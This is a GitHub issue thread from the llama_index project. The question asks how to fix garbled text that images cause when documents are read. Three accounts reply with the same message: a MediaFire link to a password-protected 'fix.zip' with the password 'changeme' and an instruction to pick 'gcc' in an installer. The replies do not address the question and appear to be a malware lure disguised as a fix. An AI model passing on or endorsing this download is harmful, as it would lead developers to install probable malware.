### ISSUE TITLE
[Question]: How to solve the problem of garbled characters caused by pictures in the read doc

### ISSUE THREAD

**Issue by cxycxm** [run-llama/llama_index#15636]
### Question Validation

- [X] I have searched both the documentation and discord for an answer.

### Question

How to solve the problem of garbled characters caused by pictures in the read doc

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
